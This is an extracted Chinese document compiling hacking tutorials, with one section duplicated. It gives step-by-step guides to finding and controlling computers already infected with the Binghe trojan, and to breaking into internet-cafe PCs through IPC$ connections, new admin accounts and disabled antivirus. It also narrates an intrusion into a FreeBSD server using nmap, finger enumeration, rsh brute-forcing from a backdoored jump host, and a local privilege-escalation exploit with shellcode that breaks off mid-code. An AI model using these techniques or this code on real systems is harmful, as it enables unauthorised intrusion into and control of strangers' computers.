黑客电脑教程.docx

1、黑客电脑教程如何一步一步进入别人计算机! 跟着TTY一步一步走进对方计算机:这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的，主要使用的软件就是著名的国产木马冰河2.2，所以，如果你已经使用过冰河2.2，就不必跟着我们往下走了。其他有兴趣的网络新手们，Lets go！ 第一步 下载网络新手快餐软件包 tty.zip到网络休闲庄（）“红客软件”-“中文软件”里下载网络新手快餐软件包，文件名是：tty.zip。该软件包里准备了本次实验所需的所有软件，大小811K。解开tty.zip，里面应有1号、2号、两个软件，是为了叙述方便而编的号，1号软件就是端口扫描工具“网络刺客II”，2

2、号软件就是著名的国产木马冰河2.2的控制端。下载完毕并解压缩之后跟我进行第二步！第二步 运行1号软件，首先出现的是“网络刺客II注册向导”，别理它，点击“稍后(Q)”就进入了网络刺客II的主界面。第三步 在网络刺客II的主界面里选“工具箱（U）”-“主机查找器（H）”，就进入了“搜索因特网主机”界面。第四步 进入“搜索因特网主机”界面后，“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了，比如你可以选61.128或选61.200等等，“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626，其他栏保持默认不动。好了，以上设置就是

3、要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了，再检查一下填对没有？如果一切OK，请点击“开始搜索”。第五步 观察“总进度”和“段进度”是否在走动。如果没有走动，那一定是IP地址设置不对，请认真检查。如果两个进度都在走动，呵呵，你就成功一半了，至少你会使用网络刺客II扫描网上开放某一端口的计算机了。下面你要作的就是静静的等待，学用黑客软件是需要耐心的。大约20-30分钟后，最下面的记录栏里就应该出现记录了（一般情况下，应该有5、6条记录）。每一条记录代表找到的中了冰河木马的一台计算机，前面是该计算机的IP地址，后面是7626（冰河木马端口）。

4、 第六步 点击“停止搜索”，但不要退出程序，到第十二步时还要用。运行2号软件冰河，进入冰河主界面。选“文件F”-“添加主机A”进入添加主机窗口。第七步 在“添加主机”窗口，“显示名称”里填入第五步里搜索到的第一条IP地址，当IP地址填入“显示名称”里后，“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。好了，检查一下IP有没有填错，如果OK，点击“确定”，在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。第八步 这一步和下一步最重要，请认真看清楚！在冰河的主界面里，点击“文件管理器”里的“我的电脑”，这时“文件管理器”右边的框里就会出现你自己的硬

5、盘分区。比如，如果你的硬盘分的是四个区，“文件管理器”右边的框里就会从上往下依次出现C：、D：、E：、F：，如果你的硬盘分的是两个区，就会出现C：、D：。第九步 点击“文件管理器”里刚才输入的第一条IP地址，稍等片刻（网速慢的情况下约10-30秒），在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗？看到了？呵呵，祝贺你，你已经成功地进入对方的计算机了！第十步 TTY，没有出现对方计算机的硬盘分区！呵呵，别急，看看冰河主界面最下端的状态栏里有什么提示，如果是下面两种情况，就放弃，返回第七步，填入搜索到的第二条IP地址：1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“

6、密码错误”等之类的提示，表示该计算机的冰河木马是加了密码的，没有办法，只得放弃！2、状态栏里出现“正在解释命令，可能是1.2以前版本”等之类的提示，也放弃，新手是搞不定的，如果以后你熟练了可以给对方升级，这是后话！第十一步 如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示，先别忙放弃，重复3-4遍第八步到第九步的操作，即点击“我的电脑”-点击输入的IP地址，如此反复3-4遍后，还是不行的话再放弃，返回第七步，填入搜索到的下一条IP地址。第十二步 如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机，呵呵，那是你的运气太差！别急，这样的运气TTY是经常碰到的！再返

7、回第五步，在“搜索因特网主机”界面里点击“开始搜索”，这时该程序又从你停止的IP地址接着往下搜索了！呵呵，等吧！搜索吧！TTY说过，只要你有时间，你一定能成功！第十三步 哇！TTY！终于成功了，！我见到对方计算机硬盘分区了！呵呵，怎么样？你成功了，我的任务完成了！ByeBye!进入对方计算机后，所有的操作和自己计算机“文件管理器”里的操作一模一样！作者：TTY OICQ1506414 主页 二年十月 于 网络休闲庄本文首刊电子邮件杂志网络休闲庄第七期 打开注册表编辑器，找到：HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Versio

8、n/Winlogon，在右边窗口点击右键新建字符串值，然后为它命名：“Legal Notice Caption”，接着点击右键新建字符串值，为其命名为：“Legal Notice Text”，双击“Legal Notice Caption”，然后输入你想在登录窗口显示的标题(比如：有毒！请勿进入！)，双击“Legal Notice Text”，输入你想在登录对话框中显示的文字(比如：本机感染恶性病毒，请不要进入，否则后果自负！)。 这样，以后如果某个人想启动你的电脑，这个由你定制的新对话框就会在登录系统前显示出来。建议你最好为系统再加上登录密码，要不然胆大的人点击确定，也能够直接进入系统。如何

9、入侵别人电脑 在这里告诉大家如何入侵别人电脑，从而演绎我们那在别人电脑上无所不能的神话 首先要确定要入侵电脑的IP，关于IP，网吧的编号和IP地址通常是相同或高一位，比如编号为 20的电脑，IP一般是192.168.0.20或192.168.0.21?大家要是上贴吧匿名发帖子的话，也会 看见IP地址 有了IP地址后，就可以连接那将被你入侵的倒霉电脑了，一般登陆电脑的用户名多是“user编号” 的形式空密码形式，所以在“命令提示符”下输入net?use?/IP地址/ipc$/user:及 net?use?/IP地址/ipc$/user:user编号命令进行连接 连接成功后必须关闭对方电脑的杀毒软

10、件，右击“我的电脑”，选择“管理”在弹出窗口中右击 “计算机管理（本地）”，选择“连接另一台计算机”，连接至那台倒霉电脑的IP号，启动 “Tenlet”服务 然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。 net?user?user编号/add net?localgroup?administators?user编号/add 然后进入C:WinntSystem32,右击CMD.EXE，选择“创建快捷方式”，然后右击快捷方式，选择 “属性”，选择“以其他用户身份运行”，运行快捷方式CMD，弹出“以其他用户身份运行”窗 口后，输入“user编号”回车 用telne

11、t?电脑IP编号?登陆至那个倒霉孩子的电脑，再从网上下载一个命令行下杀进程的软件， 比如说knlps等，在telnet上将杀毒软件进程关闭 这样就OK了 做你想做的事吧，呵呵，有兴趣的试试 有兴趣的去我空间，我Q292413458，呵呵空间里都是电脑应用如何入侵别人电脑 在这里告诉大家如何入侵别人电脑，从而演绎我们那在别人电脑上无所不能的神话 首先要确定要入侵电脑的IP，关于IP，网吧的编号和IP地址通常是相同或高一位，比如编号为 20的电脑，IP一般是192.168.0.20或192.168.0.21?大家要是上贴吧匿名发帖子的话，也会 看见IP地址 有了IP地址后，就可以连接那将被你入侵的

12、倒霉电脑了，一般登陆电脑的用户名多是“user编号” 的形式空密码形式，所以在“命令提示符”下输入net?use?/IP地址/ipc$/user:及 net?use?/IP地址/ipc$/user:user编号命令进行连接 连接成功后必须关闭对方电脑的杀毒软件，右击“我的电脑”，选择“管理”在弹出窗口中右击 “计算机管理（本地）”，选择“连接另一台计算机”，连接至那台倒霉电脑的IP号，启动 “Tenlet”服务 然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。 net?user?user编号/add net?localgroup?administators?u

13、ser编号/add 然后进入C:WinntSystem32,右击CMD.EXE，选择“创建快捷方式”，然后右击快捷方式，选择 “属性”，选择“以其他用户身份运行”，运行快捷方式CMD，弹出“以其他用户身份运行”窗 口后，输入“user编号”回车 用telnet?电脑IP编号?登陆至那个倒霉孩子的电脑，再从网上下载一个命令行下杀进程的软件， 比如说knlps等，在telnet上将杀毒软件进程关闭 这样就OK了 做你想做的事吧，呵呵，有兴趣的试试 有兴趣的去我空间，我Q292413458，呵呵空间里都是电脑应用本文的写作目的仅仅是为了给某些粗心大意的网络管理人员一个警告internet是有趣但十分

14、脆弱的，当你的计算机放在互联网上给人们提供信息与服务的同时，会引来网络中的“好奇者”的窥探。而安全性与便利性是一对矛盾在你对自己的网络做了一个安全策略考量之后，你应该确定你愿意以多大的风险来使用一些方便的服务，当然这些服务比如rlogin，可能只会使你少输入一次密码首先是确定目标撞大运乱挑一个吧，试试能不能成功呵，于是登上yahoo，上taiwan的站点小遛了一下唔，这个还不错，我们姑且称其为还是先ping一下看看情势如何别碰上有墙的就逊了C:ping Pinging 111.111.111.111 with 32 bytes of data:Reply from 111.111.111.11

15、1: bytes=32 time=621ms TTL=241Reply from 111.111.111.111: bytes=32 time=620ms TTL=241Reply from 111.111.111.111: bytes=32 time=611ms TTL=241Reply from 111.111.111.111: bytes=32 time=591ms TTL=241速度还是很快的嘛那就开始吧先登上某台跳板台湾的机器这样安全一些，不会留下你自己的IP(当然，说句题外话这样要追查到还不是很困难，曾经有个朋友同我说过，南方某大学一次被黑，种种迹象都表明黑客来自美国，IP、更改后

16、主页上留下的话语朋友受托去补漏查源，发现那IP是美国一个提供免费shell的服务供应商于是申请了一个shell，通过一系列动作成为root，查看系统日志真相大白，IP居然指向那家大学自身)。通过跳板还有一个好处如果你的尝试失败，在系统日志里留下来的是台湾本土的IP，这样的登陆失败命令比较不会引起系统管理员的注意C:nc *.*.*.* 12345就登上跳板了，12345端口里我预留了一个suid的shell好了，祭起宝刀nmap# ./nmap -sT -O 111.111.111.111Starting nmap V. 2.3BETA12 by Fyodor (fyodor, www.ins

17、ecure.org/nmap/)Interesting ports on (111.111.111.111):Port State Protocol Service7 open tcp echo9 open tcp discard19 open tcp chargen21 open tcp ftp23 open tcp telnet25 open tcp smtp37 open tcp time79 open tcp finger80 open tcp http111 open tcp sunrpc443 open tcp https512 open tcp exec513 open tcp

18、login514 open tcp shell515 open tcp printer540 open tcp uucp3306 open tcp mysqlTCP Sequence Prediction: Class=random positive incrementsDifficulty=55346 (Worthy challenge)No OS matches for host (If you know what OS is running on itNmap run completed - 1 IP address (1 host up) scanned in 17 seconds唔，

19、运气还不错，提供的服务不少，估计漏也少不到哪儿去只是没判断出系统类型，这些服务里看上去可以利用的有：Port State Protocol Service21 open tcp ftp25 open tcp smtp79 open tcp finger80 open tcp http111 open tcp sunrpc512 open tcp exec513 open tcp login514 open tcp shell540 open tcp uucp3306 open tcp mysql最近rpc攻击非常流行，原因之一恐怕是方便易行只要存在漏洞，远程就可以得到一个rootshell甚至

20、对计算机完全不懂的外行也能轻易实施，呵，那咱们来看看这个111 port的sunrpc里有什么奥妙吧# rpcinfo -p 111.111.111.111&21404# program vers proto port service100000 2 tcp 111 rpcbind100000 2 udp 111 rpcbind咦，看来没戏唱哦好在还有那么多服务，待偶慢慢试来看看是什么FTP服务器软件吧，说不定有远程溢出的漏洞呢# ./nc 111.111.111.111 21#乖乖龙的东，什么输出也没有就关上了，这是如何一回事？C:ftp 111.111.111.111Connected t

21、o 111.111.111.111.Connection closed by remote host.呵呵，看来过滤掉了嘛怎么办？看看25端口是运行什么SMTP服务的吧# ./nc 111.111.111.111 25220 *-*-*-* ESMTP Sendmail 8.9.3/8.9.3; Wed, 5 Apr 2000 08:56:59 GMTSendmail 8.9.3/8.9.3？好象没有什么致命的漏洞呀看看是什么WEB服务器先# (echo head /http/1.0;echo;echo)|./nc -w 3 111.111.111.111 80501 Method Not I

22、mplementedMethod Not Implementedhead to /http/1.0 not supported.Invalid method in request head /http/1.0Apache/1.3.9 Server at *-*-*-* Port 80阿帕奇这个版本的东东至少偶的印象中没有什么“死穴”好在开了finger，俺就土土地先把用户列表弄出来吧finger Orootaaabbbcccddd总算有点收获，那么下一步该做什么呢？既然这台主机开了512、513、514的r系列服务，那就值得尝试一下，说不定哪个偷懒的家伙直接在.rhosts里设了+ usern

23、ame那我就爽了顺手写了个shell script，让它去一个一个地尝试rsh命令，传到肉鸡上# chmod 700 rsh.sh# nohup ./rsh.sh 它会自动地在/etc/passwd和/etc/shadow里加上finger出来的用户名，然后su过去，再对远程目标111.111.111.111执行rsh命令，成功则返回该用户名然后将备份的passwd和shadow再拷回去删除临时文件，生成报告文件(或许是我对.rhosts的理解还有问题，有时我在机里加上+ +但rcp时还会报Permission denied或者connectrefused,所以干脆都su成用户或许太笨;)我便

24、再去MUD里当我的大虾了半个小时后回来,登上肉鸡，读取报告文件.rsh.txt# cat ./.rsh.txtccchehe，非常抱歉，看来俺得到一个shell了进去看看# rlogin -l ccc 111.111.111.111Last login: Fri Mar 24 19:04:50 from 202.102.2.147Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994The Regents of the University of California. All rights reserved.FreeBSD 3

25、.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999You have mail.呵，原来是FreeBSD 3.2-RELEASE呀，感觉不错，进来了，看看我的权限如何吧 ididuid=1003(ccc) gid=1003(ccc) groups=1003(ccc)看来能做的事还相当有限噢再看看系统里有没有别人先 ww9:03PM up 6 days, 2:37, 3 users, load averages: 0.00, 0.01, 0.00USER TTY FROM LOGIN IDLE WHATccc p0 *.*.*.* 6:04P

26、M 2:41 -tcsh (tcsh)不错，就我自在逍遥看看passwd吧 cat /etc/passwdcat /etc/passwdroot:*:0:0:Charlie &:/root:/usr/local/bin/bashaaa:*:1005:2000:/home/www:/usr/local/bin/tcshbbb:*:1006:1006:/home/bbb:/usr/local/bin/tcshccc:*:1003:1003:/home/ccc:/usr/local/bin/tcshddd:*:1008:1008:ddd:/home/www:/usr/local/bin/tcshee

27、e:*:1009:1009:eee:/home/eee:/usr/local/bin/tcsh很明显/home/www就是www用户的主目录了先看看俺ccc对该目录有没有写权限 echo test /home/www/testtest: Permission denied.看来如果想改他的主页，还得另外想办法啦不过都已经有了一个用户shell了，最高权限其实也只有一步之遥啦，好吧，翻翻数据库里有什么关于FreeBSD 3.2的记录，看来东西不多呀而且有些还是安装外来软件包之后才带来的风险先看看有没有编译的权限再说吧，否则还得找一台BSD来编译 ls /usr/local/bin|grep gc

28、cgcc一般情况下自己安装的gcc是会在这个目录的啦，否则最好find一下比较保险。这下方便了可以直接传代码上来试试了几个之后我找到这么个东西：/* by Nergal */#include #include #include #include #include #include #include #include #include char shellcode =xebx0ax62x79x20x4ex65x72x67x61x6cx20xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0fx89x56x14x88x56x19x31xc0xb0x3bx8

29、dx4ex0bx89xcax52x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04x00;#define PASSWD ./passwdvoidsg(int x)intmain(int argc, char *argv)unsigned int stack, shaddr;int pid,schild;int fd;char buff40;unsigned int status;char *ptr;char name4096;char sc4096;char signature = signature;signal(SIGUSR1, sg);if (symlink(usr/bin/passwd,PASSWD) & errno!=EEXIST)perror(creating symlink:);exit(1);shaddr=(unsigned int)&shaddr;stack=shaddr-2048;if (argc1)shaddr+=atoi(argv1);if (argc2)stack+=atoi(argv2);fprintf(stderr,shellc